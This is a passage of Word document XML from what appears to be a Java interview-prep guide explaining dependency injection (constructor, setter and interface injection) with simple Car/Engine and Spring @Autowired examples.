    <w:p w14:paraId="5DAAAB0D" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188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The class constructor receives the required dependencies as parameters, ensuring that the class cannot function without these dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7770F48D" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188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This approach is often preferred because it makes dependencies explicit and ensures that they are available when the object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362B577"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD873F7"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public class Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E5AD7C"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rivate Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443D5752" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004BC680"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 Constructor Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760ACA94"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ublic Car(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170A84CF"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this.engine = engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0995B06D"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4E9DF40D" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA8883E"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ublic void start() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F6D1F"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engine.run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89F363"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164AEE7D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ABFCDD" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188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Setter Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Dependencies are provided through setter methods after the object has been created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081080C2" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188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This approach allows for optional dependencies and can be useful when you want to change the dependencies at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C28371D"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD74CEC"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public class Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AEB71A"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rivate Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B33138" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297403D7"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 Setter Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C4286B"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    public void setEngine(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4F7E7E"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this.engine = engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B477A5"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045EE6E9" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CD36C3"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ublic void start() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BAA092"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engine.run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AED0B0"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2D88CD00"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742D4367" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188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Interface Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The class implements an interface that provides a method for injecting the dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077FAE6C" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1888"/>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This is less common in practice compared to constructor or setter injection but can be useful in certain scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48531D35"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37944808"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public interface EngineAware {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9C2336"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void setEngine(Engine engine);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FFB352"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8F2F6D" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521B2BE2"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public class Car implements EngineAware {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776F5B49"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rivate Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060DE5BA" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E32BAC1"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B336211"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ublic void setEngine(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D460BDA"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this.engine = engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634196B1"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663EDEBD" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F3DBB8"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ublic void start() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A40DA43"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engine.run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550233ED"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508EE10A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145C2396" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6"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Advantages of Dependency Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCDFB00" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1889"/>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Loose Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: DI reduces the coupling between objects, as they do not need to know how to create their dependencies. They only need to know what dependencies are required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5222E9BE" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1889"/>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Easier Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since dependencies are injected, it becomes easier to provide mock implementations during testing, improving unit testing and making the code more testable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E0773" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1889"/>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Code Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Objects can be reused without worrying about their dependencies, as they can be provided externally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3820900F" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1889"/>
        </w:num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Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The system becomes more flexible to changes, as you can change the implementation of a dependency without modifying the dependent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54435BA6" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6"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Example in Spring Framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371FE518"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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, dependency injection is one of the key features, and it's typically done using annotations or XML configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA491E0"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Constructor Injection in Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D1525"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A0ECF5"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public class Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF358A"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rivate final Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5D45C" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D0B679"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Autowired  // Spring injects the dependency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF50CC3"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ublic Car(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F74F48"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this.engine = engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A97111"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2363994E" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFD1031"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ublic void start() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D62ECE3"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engine.run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27268613"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0BF256EE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD9BA2" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E489861"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A84E6"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lastRenderedPageBreak/>
        <w:t>public class Engine {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48994638"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ublic void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B27A3F1"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System.out.println("Engine is running!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC926F8"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11E8F0CE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306ADA4A"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In this example, Spring will automatically inject the Engine bean into the Car bean through constructor injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E451F5A"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Setter Injection in Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD08AB4"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3765C80C"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public class Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B85816"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rivate Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79183B20" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A1337C"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Autowired  // Spring injects the dependency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1040F571"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ublic void setEngine(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271497EA"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this.engine = engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C14B7C2"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21DA7FD2" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566655CF"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public void start() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF6BAB8"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engine.run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A65FA7D"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4547587D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A8D66" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAF61A9" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dependency Injection is a fundamental concept for building scalable and maintainable applications. By removing the responsibility of object creation from the dependent classes and letting the dependencies be injected, it promotes loose coupling, easier testing, and better maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043D51B2" w14:textId="5B043D9E" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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F124595">
          <v:rect id="_x0000_i2118" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB0C6FF" w14:textId="687BF494" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="002F649D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="444" w:name="_Toc196307924"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the different ways of injection</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="444"/>
    </w:p>
    <w:p w14:paraId="79E7BD44" w14:textId="6F31B457" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>three primary types of Dependency Injection (DI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Constructor Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Setter Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Interface Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These methods differ in how the dependencies are provided to the class that requires them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54E465" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="0032015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1. Constructor Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CAD8EC"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In Constructor Injection, the dependencies are provided through the constructor of the class. The class cannot be instantiated without the required dependencies, which are passed as parameters in the constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F0B498"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Key Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4D0369" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1890"/>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Dependencies are required at the time of object creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0788A4F8" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1890"/>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Ensures that the object is always in a valid state with all required dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D7F0F" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1890"/>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Preferred method as it makes the dependencies explicit and immutable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C702870"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CBF6D3"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public class Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC8E7F3"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private final Engine engine;</w:t>
      </w:r>
    </w:p>
